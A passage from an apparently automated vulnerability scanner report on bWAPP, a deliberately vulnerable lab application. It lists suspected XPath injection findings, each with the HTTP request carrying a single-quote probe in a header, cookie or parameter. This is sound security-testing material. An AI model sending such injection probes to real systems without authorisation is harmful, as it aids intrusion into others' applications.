Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13504

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.52. http://192.168.52.147/bWAPP/ba_pwd_attacks.php [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /bWAPP/ba_pwd_attacks.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:08:38 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13504

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.53. http://192.168.52.147/bWAPP/ba_pwd_attacks.php [admin cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks.php

Issue detail

The admin cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the admin cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /bWAPP/ba_pwd_attacks.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:07:48 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13504

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.54. http://192.168.52.147/bWAPP/ba_pwd_attacks.php [name of an arbitrarily supplied URL parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks.php

Issue detail

The name of an arbitrarily supplied URL parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied URL parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /bWAPP/ba_pwd_attacks.php?1'=1 HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:08:06 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13504

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.55. http://192.168.52.147/bWAPP/ba_pwd_attacks.php [secret cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks.php

Issue detail

The secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /bWAPP/ba_pwd_attacks.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2f'; admin=0

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:07:37 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13504

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.56. http://192.168.52.147/bWAPP/ba_pwd_attacks.php [security_level cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks.php

Issue detail

The security_level cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /bWAPP/ba_pwd_attacks.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1'; secret=QW55IGJ1Z3M%2F; admin=0

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:07:26 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13438

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.57. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [Base64-decoded value of the secret cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks_2.php

Issue detail

The Base64-decoded value of the secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Base64-decoded value of the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_pwd_attacks_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2fJw%3d%3d; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:09:05 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.58. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks_2.php

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_pwd_attacks_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:09:50 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.59. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks_2.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_pwd_attacks_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:09:41 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.60. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [admin cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks_2.php

Issue detail

The admin cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the admin cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_pwd_attacks_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0'; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:08:45 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.61. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [bug parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks_2.php

Issue detail

The bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_pwd_attacks_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1'&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:08:08 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.62. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [form_bug parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks_2.php

Issue detail

The form_bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_pwd_attacks_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:08:18 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.63. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [form_security_level parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks_2.php

Issue detail

The form_security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_pwd_attacks_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

form_security_level=submit'&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:09:18 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13504

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.64. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [movie_genre cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks_2.php

Issue detail

The movie_genre cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the movie_genre cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_pwd_attacks_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror'

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:08:55 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.65. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [name of an arbitrarily supplied URL parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks_2.php

Issue detail

The name of an arbitrarily supplied URL parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied URL parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_pwd_attacks_2.php?1'=1 HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:09:23 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.66. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [name of an arbitrarily supplied body parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks_2.php

Issue detail

The name of an arbitrarily supplied body parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied body parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_pwd_attacks_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit&1'=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:09:14 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.67. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [secret cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks_2.php

Issue detail

The secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_pwd_attacks_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2f'; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:08:39 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.68. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [security_level cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks_2.php

Issue detail

The security_level cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_pwd_attacks_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php
Content-Type: application/x-www-form-urlencoded
